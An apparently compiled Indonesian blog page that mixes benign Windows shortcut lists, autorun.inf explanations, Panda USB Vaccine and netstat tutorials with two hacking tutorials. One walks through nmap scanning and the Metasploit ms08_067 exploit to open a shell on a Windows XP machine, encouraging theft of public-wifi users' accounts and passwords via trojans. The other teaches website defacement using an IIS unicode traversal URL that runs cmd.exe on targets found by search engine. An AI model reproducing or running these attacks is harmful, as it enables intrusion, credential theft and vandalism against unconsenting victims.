Fungsi tombol shortkey dalam windows untuk menjalankan komputer

Ini dia perpaduantombol khusus untuk windows

General Keyboard Shortcuts
• CTRL+C (Copy)
• CTRL+X (Cut)
• CTRL+V (Paste)
• CTRL+Z (Undo)
• DELETE (Delete)
• SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
• CTRL while dragging an item (Copy the selected item)
• CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
• F2 key (Rename the selected item)
• CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
• CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
• CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
• CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
• CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
• SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
• CTRL+A (Select all)
• F3 key (Search for a file or a folder)
• ALT+ENTER (View the properties for the selected item)
• ALT+F4 (Close the active item, or quit the active program)
• ALT+ENTER (Display the properties of the selected object)
• ALT+SPACEBAR (Open the shortcut menu for the active window)
• CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
• ALT+TAB (Switch between the open items)
• ALT+ESC (Cycle through items in the order that they had been opened)
• F6 key (Cycle through the screen elements in a window or on the desktop)
• F4 key (Display the Address bar list in My Computer or Windows Explorer)
• SHIFT+F10 (Display the shortcut menu for the selected item)
• ALT+SPACEBAR (Display the System menu for the active window)
• CTRL+ESC (Display the Start menu)
• ALT+Underlined letter in a menu name (Display the corresponding menu)
• Underlined letter in a command name on an open menu (Perform the corresponding command)
• F10 key (Activate the menu bar in the active program)
• RIGHT ARROW (Open the next menu to the right, or open a submenu)
• LEFT ARROW (Open the next menu to the left, or close a submenu)
• F5 key (Update the active window)
• BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
• ESC (Cancel the current task)
• SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)

Dialog Box Keyboard Shortcuts
• CTRL+TAB (Move forward through the tabs)
• CTRL+SHIFT+TAB (Move backward through the tabs)
• TAB (Move forward through the options)
• SHIFT+TAB (Move backward through the options)
• ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
• ENTER (Perform the command for the active option or button)
• SPACEBAR (Select or clear the check box if the active option is a check box)
• Arrow keys (Select a button if the active option is a group of option buttons)
• F1 key (Display Help)
• F4 key (Display the items in the active list)
• BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)

Microsoft Natural Keyboard Shortcuts
• Windows Logo (Display or hide the Start menu)
• Windows Logo+BREAK (Display the System Properties dialog box)
• Windows Logo+D (Display the desktop)
• Windows Logo+M (Minimize all of the windows)
• Windows Logo+SHIFT+M (Restore the minimized windows)
• Windows Logo+E (Open My Computer)
• Windows Logo+F (Search for a file or a folder)
• CTRL+Windows Logo+F (Search for computers)
• Windows Logo+F1 (Display Windows Help)
• Windows Logo+ L (Lock the keyboard)
• Windows Logo+R (Open the Run dialog box)
• Windows Logo+U (Open Utility Manager)

Accessibility Keyboard Shortcuts
• Right SHIFT for eight seconds (Switch FilterKeys either on or off)
• Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
• Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
• SHIFT five times (Switch the StickyKeys either on or off)
• NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
• Windows Logo +U (Open Utility Manager)

Windows Explorer Keyboard Shortcuts
• END (Display the bottom of the active window)
• HOME (Display the top of the active window)
• NUM LOCK+Asterisk sign (Display all of the subfolders that are under the selected folder)
• NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
• NUM LOCK+Minus sign (-) (Collapse the selected folder)
• LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
• RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)

Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts: • RIGHT ARROW (Move to the right or to the beginning of the next line)
• LEFT ARROW (Move to the left or to the end of the previous line)
• UP ARROW (Move up one row)
• DOWN ARROW (Move down one row)
• PAGE UP (Move up one screen at a time)
• PAGE DOWN (Move down one screen at a time)
• HOME (Move to the beginning of the line)
• END (Move to the end of the line)
• CTRL+HOME (Move to the first character)
• CTRL+END (Move to the last character)
• SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)Microsoft Management Console (MMC) Main Window Keyboard Shortcuts

• CTRL+O (Open a saved console)
• CTRL+N (Open a new console)
• CTRL+S (Save the open console)
• CTRL+M (Add or remove a console item)
• CTRL+W (Open a new window)
• F5 key (Update the content of all console windows)
• ALT+SPACEBAR (Display the MMC window menu)
• ALT+F4 (Close the console)
• ALT+A (Display the Action menu)
• ALT+V (Display the View menu)
• ALT+F (Display the File menu)
• ALT+O (Display the Favorites menu)

MMC Console Window Keyboard Shortcuts
• CTRL+P (Print the current page or active pane)
• ALT+Minus sign (-) (Display the window menu for the active console window)
• SHIFT+F10 (Display the Action shortcut menu for the selected item)
• F1 key (Open the Help topic, if any, for the selected item)
• F5 key (Update the content of all console windows)
• CTRL+F10 (Maximize the active console window)
• CTRL+F5 (Restore the active console window)
• ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
• F2 key (Rename the selected item)
• CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)

Remote Desktop Connection Navigation
• CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
• ALT+PAGE UP (Switch between programs from left to right)
• ALT+PAGE DOWN (Switch between programs from right to left)
• ALT+INSERT (Cycle through the programs in most recently used order)
• ALT+HOME (Display the Start menu)
• CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
• ALT+DELETE (Display the Windows menu)
• CTRL+ALT+Minus sign (-) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
• CTRL+ALT+Plus sign (+) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)

Microsoft Internet Explorer Navigation
• CTRL+B (Open the Organize Favorites dialog box)
• CTRL+E (Open the Search bar)
• CTRL+F (Start the Find utility)
• CTRL+H (Open the History bar)
• CTRL+I (Open the Favorites bar)
• CTRL+L (Open the Open dialog box)
• CTRL+N (Start another instance of the browser with the same Web address)
• CTRL+O (Open the Open dialog box, the same as CTRL+L)
• CTRL+P (Open the Print dialog box)
• CTRL+R (Update the current Web page)
• CTRL+W (Close the current window)

memprotek autorun.inf dengan PANDA USB VACCINE

Satu terobosan baru telah dibuat oleh Panda Research Blog. Karena melihat efek negatif fasilitas autorun windows yang sering digunakan sebagai penyebaran virus, Panda membuat program sederhana (gratis/free) tetapi cukup ampuh untuk mencegah virus membuat file autorun.inf, program ini disebut Panda USB Vaccine

Hal ini sepertinya setelah mereka melihat merebaknya worm W32/Conficker, W32/sality, W32/virut dan sejenisnya.

Dua fungsi utama dalam aplikasi ini :

  • Computer Vaccination, yaitu untuk memberi vaksin komputer (PC) dalam upaya menon aktifkan fasilitas autorun windows. Sehingga tidak ada program dari USB Flashdisk/CD/DVD drive dapat berjalan sendiri (otomatis) tanpa interaksi penggunanya. Untuk Komputer yang sudah diberi “vaksin” ini, vaksinnya bisa dihilangkan dengan program ini juga.
  • USB Vaccination, fasilitas ini akan memberikan “vaksin” ( membuat file autorun.inf yang tidak bisa di edit, rename, di hapus meskipun dengan software seperti unlocker) di USB Flash Drive (Flahsdisk). Dengan begitu virus tidak akan bisa menyebar (secara otomatis) melalui flashdisk dengan perantara autorun.inf, dan flashdisk tetap bisa digunakan seperti biasa.

Perhatian: Meskipun begitu, virus tetap bisa meng-copy ( memperbanyak diri ) di flashdisk, hanya saja tidak bisa berjalan (menyebar) secara otomatis menggunakan autorun.inf. Selain itu perlu di ingat juga bahwa jika sudah di beri vaksin, maka Flashdisk tidak bisa dikembalikan ke keadaan sebelumnya (keadaan tanpa vaksin), kecuali dengan di format ulang.

Penggunaan USB Vaccine dengan Command Line

Untuk pengguna yang sudah berpengalaman/ahli (advanced), Panda USB Vaccine bisa dijalankan dengan command line. Misalnya dimanfaatkan untuk menjalankan USB Vaccine secara otomatis ketika booting, memberi vaksin komputer dalam jaraingan dan lainnya. Parameter inputnya adalah sebagai berikut :

USBVaccine.exe [ A|B|C…|Z ] [ +system|-system ] [ /resident [/hidetray] ]

Keterangan :
[drive unit]: Vaccinate drive unit
+system : Computer vaccination
-system : Remove computer vaccination
/resident: Start program hidden and prompt for vaccinating every new drive
/hidetray: Hides tray icon when used with the /resident command

Contoh,
untuk memberi vaksin USB Flash drive F:\ dan G:\ bisa menggunakan perintah :
USBVaccine.exe F G

Untuk memberi vaksin komputer, dengan perintah
USBVaccine.exe +system

Untuk memberi vaksi komputer dan menampilkan informasi ketika ada drive baru, tanpa menampilkan icon di sistem tray, bisa menggunakan perintah berikut :

USBVaccine.exe /resident /hidetray +system

Dengan perintah terakhir ini dan dibuat shortcut di start up folder (dengan atau tanpa parameter /hidetray) maka setiap komputer booting, USB Vaccine akan otomatis berjalan dan akan memberi vaksin komputer serta menampilkan konfirmasi untuk memberikan vaksin jika ada Flashdisk (USB Drive) yang baru dipasang dan didalamnya idak ada vaksin ini.

Panda USB Vaccine berjalan di Windows 2000 SP4, Windows XP SP1-SP3 dan juga Windows Vista SP0-SP1. Aplikasi ini tidak perlu di install, langsung dijalankan saja, dan hanya berukuran sekitar 392 KB.

DOWNLOAD NOW

sumber:handysatria

memahami tentang apa itu autorun.inf

Mungkin sebagian besar kita sudah mengetahui apa itu Autorun.inf, tetapi saya yakin masih banyak juga yang belum tahu atau masih kurang tepat memahami tentang file autorun.inf ini. Hal ini terbukti masih sering kita dengan orang bertanya tentang virus Autorun.Inf, bagaimana cara menghapusnya dan lain-lainnya.

Kali ini akan dibahas sedikit lebih dalam mengenai Autorun.inf, semoga yang sudah tahu semakin tahu dan yang belum tahu mulai sedikit paham tentang autorun.inf, baik struktur yang ada didalamnya, manfaat, bahaya dan cara mematikan autorun.inf.

Autorun atau autoplay merupakan fasilitas di sistem operasi yang berfungsi menjalankan file secara otomatis ketika media seperti CD-ROM, DVD-ROM, Flash disk dan lainnya di masukkan/pasang di komputer. Sehingga ketika berbagai media tersebut dimasukkan, tanpa kita menjalankan apapun, ada program yang akan otomatis berjalan sendiri. Fitur ini biasa dimanfaatkan dalam CD Driver yang disertakan ketika membeli motherboard / VGA. Tetapi saat ini tidak dipungkiri malah dimanfaatkan sebagai media penyebar virus, terutama melalui flashdisk. Apalagi dengan penggunaan flashdisk yang sudah seperti jamur di musim hujan..

Sedangkan file Autorun.inf sendiri merupakan file yang berisi instruksi tertentu, tentang apa yang otomatis dijalankan ketika media seperti flashdisk/CD dimasukkan ke komputer. Instruksi ini dapat berupa perintah untuk menjalankan file exe.

STRUKTUR AUTORUN.INF

Autorun.inf hanya berupa text file biasa dan bisa dibuka dengan text editor seperti notepad. Ada baris-baris kode yang umum dijumpai didalamnya. Sebenarnya ada beberapa bagian (Key) yang bisa ditulis di autorun, yaitu [Autorun], [Content], [ExclusiveContentPaths], [IgnoreContentPaths], dan [DeviceInstall]. Disini hanya akan dibahas beberapa struktur [Autorun] saja, karena memang ini yang sering kita lihat ( selengkapnya bisa di baca disini )

Open

Perintah ini akan otomatis menjalankan file exe yang ada. Misalnya sebagai berikut
Open=setup.exe ( akan menjalankan file setup.exe yang berada satu direktory dengan autorun /root direktory)

Open=virus\inivirus.exe (akan menjalankan file inivius.exe yang ada di folder virus)

action
Untuk menampilkan nama/pesan ketika muncul Autoplay dialog.

shellexecute

Hampir sama dengan perintah Open, tetapi bisa juga untuk selain file exe, termasuk link website dan bisa ditambah dengan parameter sesudah nama file. Contoh :

shellexecute=http://ebsoft.web.id
action=Kunjungi ebsoft.web.id

icon

Untuk memberi icon di media yang dipakai (yang berisi autorun.inf). Bisa menggunakan file .ico, .exe .dll maupun .bmp. Contohnya :

icon=MyProg.exe,1
icon=myicon.ico

label

untuk memberi label (nama) pada media yang digunakan (nama drive CD-ROM atau flashdisk yang berisi autorun.inf tersebut.

label=Flashdisk Hebat

shell

Untuk menampilkan menu ketika klik kanan drive yang bersangkutan. Misalnya contoh berikut :

shell\menu baru=buka file contoh
shell\menu-baru\command=notepad "file-contoh.txt"
shell=menu baru

dengan kode diatas, maka ketika kita klik kanan drive-nya akan muncul menu “buka file contoh”. jika baris pertama dihilangkan maka menunya “menu baru”. dan ketika menu tersebut di klik akan dijalankan notepad dengan membuka file “file-contoh.txt”. Jadi ketika baris kode tersebut saling berhubungan. Jika baris 1 da 3 sama-sama digunakan maka baris 3 akan diabaikan.

Selanjutnya ketika fasilitas Autorun di hilangkan / di non aktifkan, maka program di open dan shellexecute tidak akan berjalan secara otomatis. Tetapi label, icon dan menu klik kanan tetap akan tampil. Agar lebih aman, maka kita bisa me-nonaktifkan fasilitas Autorun ini. bagaimana caranya ? Berikut penjelasannya :

Berbagai cara Me-nonaktifkan fasilitas Autorun di Windows

* Menekan dan menahan tombol Shift ketika kita memasang/memasukkan Flashdisk/CD-ROM ( tidak berjalan di windows Vista).
* Me-nonaktifkan melalui Registry
* Memanfaatkan fasilitas gpedit.msc

Me-nonaktifkan Autorun melalui Registry

1. Buka Registry Editor, Start Menu > Run, ketikkan Regedit
2. Buka Key berikut : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Jika ada Key NoDriveTypeAutoRun, maka double klik dan isi nilainya dengan salah satu nilai berikut :
Decimal Hexadecimal Efek yang dihasilkan
181 b5 Autorun tidak berjalan sama ekali untuk semua media
149 95 Autorun hanya aktif untuk CD-ROM / DVD-ROM
177 b1 Autorun hanya aktif untuk flash drive (flashdisk dan sejenisnya)
145 91 Autorun aktif untuk semua media
4. Jika Key NoDriveTypeAutoRun tidak ada maka buak dengan cara klik kanan, pilih New > Binary Value. Kemudian beri nama NoDriveTypeAutoRun, dan isi nilainya ( double klik) dengan nilai diatas.
5. Langkah diatas hanya berefek di User yang bersangkutan. Agar berefek di semua pengguna komputer, lakukan hal yang sama untuk Key : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\

Jika masih menggunakan Win 9x/ME maka caranya sedikit berbeda. Selengkapnya bisa dibaca artikel disini. Lebih jauh tentang caranya bisa dibaca juga artikel berikut : Mencegah virus menular melalui Flashdisk

Memanfaatkan fasilitas gpedit.msc

Ini bisa dilakukan untuk pengguna Windows 2000, Server 2003 dan Windows XP Professional, langkah-langkahnya sebagai berikut :

1. Dari Start Menu > Run, ketikkan gpedit.msc lalu klik OK.
2. Pilih Computer Configuration > Administrative Template dan klik System
3. Di panel Settings, klik kanan Turn off Autoplay dan klik Properties ( di windows 2000, namanya Disable Autoplay)
4. Klik Enabled kemudian pilih All drives di box Turn off Autoplay untuk mematikan fasilitas autorun di semua drive.
5. Klik OK, dan tutup window dialog tersebut.
6. Restart Komputer.

Untuk Pengguna Windows Vista, caranya sebagai berikut :

1. Dari Start Menu ketikkan Gpedit.msc di box Start Search lalu tekan enter ( mungkin akan di tampilkan perintah untuk memasukkan password administrator)
2. Di bagian Computer Configuration pilih Administrative Templates lalu pilih lagi Windows Components klik Autoplay Policies
3. Di panel Details, double klik Turn off Autoplay
4. Klik Enabled dan pilih All drives di box Turn off Autoplay untuk me-nonaktifkan Autorun di semua drive.
5. Restart Komputer.

Jika cara diatas tidak berhasil menon aktfkan autorun, maka kemungkinan perlu download update sesuai dengan versi windows yang digunakan. Detailnya sebagai berikut :


Referensi :

http://en.wikipedia.org/wiki/Autorun.inf

http://support.microsoft.com/kb/953252/en-us

http://www.dailycupoftech.com/usb-drive-autoruninf-tweaking/

http://msdn.microsoft.com/en-us/library/bb776823.aspx

sumber :http://ebsoft.web.id/2008/10/25/mengenal-lebih-dekat-autorun-inf/

menyusup ke komputer orang lain dengan exsploit


kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:


1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru...ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa
anda bayangkan kan...
kita bisa mengambil chips orang dengan mudah dan menjualnya dengan senang hati..... karna AKUN ANDA ADA PADA KAMI ...hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )... eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahua ( mulai mi muncul tanduknya kepalaku) hahahahahaha

2.> bagaimana caranya, ..hehehe AJAR DULUEE ...hehhe pasti begitu tooo... huahuahuahuahuahuahuahuahua....
so lanjut ke TKP
============================================
yang kita mesti sediakan adalah beberapa alat bantu , yang bisa anda dapatkan secara GRATIS...
- OS BACKTRACK ( terserah Backtrack 3 Or 4 ) hehehehe (http://indobacktrack.or.id/2009/02/mirror-link-lokal-download-backtrack-4-iso/)
- John the Ripper (http://www.openwall.com/john/)
- pwdump6 ( http://www.foofus.net/fizzgig/pwdump/ )
- Trojan Buatan Sendiri atau keylogeer atau apalahhhh
- kopi panas
- pisang goreng atau roti bakar ( yang rasa keju lebih enak )
- ROKOK SAMPOERNA ^_^!!! huahuahua

Sudah lengkap..?!
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www.metasploit.com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan ( ededeh panjang sekali kiii )

Pertama kita masuk dulu ces ke konsole( itueee klo di windows namanya CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole

Untuk Melihat Lihat list exploits-nya , gunakan perintah :
msf > show exploits
windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

Wokehlah kalo begitu....sekarang kita Mulai menScan Komputer Target Kita...heehhehehheheh tapi untuk lebih menyakinkan saya melihat IP Kita,.huahuahua ternyata ip kita ni bagus Juga Yah : 192.168.1.20 :

msf > sudo nmap -v -sS -A -O 192.168.1.28
[*] exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2010-01-08 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.28 [1 port]
Host 192.168.1.28 appears to be up ... good.
Interesting ports on 192.168.1.28:
Not shown: 1712 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds <------ MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer) Device type: general purpose Running: Microsoft Windows XP OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3 Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka ( lihat Yang ada Tanda Panah <---- ). Mari kita coba masuk ke komputer ini dengan menggunakan : exploit windows/smb/ms08_067_netapi. msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan
show options :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :
msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :
msf exploit(ms08_067_netapi) > show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 192.168.1.28 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting

sekarang jalankan exploit :
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
Jreeeengg jeeenggg..... selamat nah...anda sudah menguasai satu komputer....nahhhhhhh sekarang terserah anda....kan masih ada 3 alat lagi yang blom kita gunakan..
nah untuk itu..anda harus mencari sendiri cara untuk menginstal trojan di komputernya dan mendapatkan sesuatu yang anda inginkan.....(seperti password FB ao dll) cape meka mengetik bela..
kan sa sudah kasihkan sampai penguasaan komputer....sekarang terserah anda.. ^_^ mat belajar yahh.....
sumber:tambah-lawas

mengetahui status koneksi komputer

lagi asik-asik main di internet,eh tahu-tahu koneksi putus!dan bingung kapan connect lagi!?gampang..!!sebenarnya cmd atau lebih di kenal dos bawaan window itu memiliki banyak rahasia dan mujarab buat hack komputer orang lain.dos juga dapat di pakai buat mengetahui koneksi jaringan,trafik,koneksi pada komputer anda.cara yang paling ampuh adalah memakai basic netstat .Fungsi netstat ini cukup beragam (tergantung dari commandnya) namun yang utamanya fungsi netstat ini adalah memeriksa status jaringan serta memberikan informasi tentang adanya transfer data yang terjadi dalam sebuah jaringan yang terhubung ke komputer, baik itu jaringan local (LAN) maupun jaringan Internet, baik itu transfer data masuk (incoming) atau juga outgoing.

Cara mengoperasikan netstat adalah dengan masuk ke CMD dengan urutan klik tombol start > run > ketikkan cmd > klik OK (pada windows xp) atau klik tombol start > ketikkan cmd pada form search > enter (pada windows vista dan 7)

setelah anda berhasil memasuki CMD dengan baik maka tugas anda selanjutnya adalah ketikkan netstat lalu klik enter

setelah itu anda akan mendapatkan informasi-informasi mengenai protocol, Local address, foreign address, dan state.

o,iya, operasi pada netstat juga tidak hanya terbatas pada saat kita mengetik netstat lalu enter saja, tapi lebih dari itu, berikut beberapa operasi atau command yang bisa dijalankan pada netstat:

1. -a: Berfungsi untuk memberikan informasi mengenai seluruh koneksi TCP yang aktif serta Port dari TCP dan UDP di dalam komputer yang dalam state (status) listening
2. -b: Memberikan informasi mengenai nama dari binary program yang memiliki keterlibatan dalam membentuk setiap koneksi(sudah terhubung) atau juga listening port
3. -e: memberikan informasi terkait ethernet
4. -n: memberikan informasi tentang address (alamat) serta no port dengan format numeric
5. -o: menampilkan ID (PID) dari tiap owner yang bergabung dalam koneksi
6. -p proto: menunjukkan koneksi yang diartikan oleh proto
7. -r: menampilkan route table (table routing)
8. -s: memberikan informasi statistik dari tiap protocol
9. -t interval: menampilkan kembali statistik yang telah dipilih(selected statistics)
10.-v :melihat aktivitas saat koneksi(request data)

Keterangan: jangan lupa menambahkan embel-embel netstat di depan command tersebut atau sebelum commands tsb di ketik, ketikkan netstat dahulu, misalnya netstat -a, jangan -a saja

adapun definisi dari beberapa elemen netstat adalah sebagai berikut:

1. Foreign address: menampilkan informasi mengenai alamat koneksi yang dituju oleh local address, format foreign address adalah xxxx:yyyy nah yang xxxx adalah alamat dari koneksi yang dituju (biasanya website/local host) sementara yang yyyy adalah port yang dituju
2. Local address: sama seperti foreign address, hanya saja local address ini untuk komputer local kita yang aktiv melakukan koneksi dengan jaringan luar (foreign address), format local address ini adalah zzzz:tttt dengan zzzz adalah alamat host dalam komputer, dan tttt adalah port
3. Proto: menampilkan jenis protocol yang digunakan (TCP atau UDP)
4. State: status dari tiap koneksi yang terhubung, kolom state ini memiliki 5 kemungkinan yaitu:

-ESTABLISHED: koneksi berhasil
-LISTENING: koneksi siap 100 persen (namun koneksi belum berlangsung)
-SYN_RECEIVED: menerima SYN
-SYN_SENT: mengirim SYN ( waspada jika ditemukan state dari SYN_SENT dalam jumlah yang cukup banyak dan di luar kewajaran, karena efeknya paket data yang dikirim akan lebih ketimbang yang diterima sehingga koneksi akan lambat, hal ini bisa jadi merupakan indikasi adanya malware (trojan,virus,worm,dan lain sebagainya) yang melakukan akses terhadap jaringan
-TIME_WAIT: menunggu koneksi untuk terhubung

Yang ingin Saya beritahu adalah yang -v yang mana fungsi ini lumayan bagus buat kalian yang lagi iseng buat cari tahu apa yang kamu kerjakan(ngomong apaan sih!).oke!kembali ke laptop
buka cmd .caranya start>run|>cmd(biar cepet).
lalu ketik netstat -v nanti hasilnya kaya gini

atau juga bisa pakai netstat -v "ipkomputer".contoh c:>netstat -v 192.168.1.1 lalu di enter
sumber:lafalofe.blogspot.com/2010/01/netstat.html

Deface of defacer via unicode bug Microsoft IIS

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..smile sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

*DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
-------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

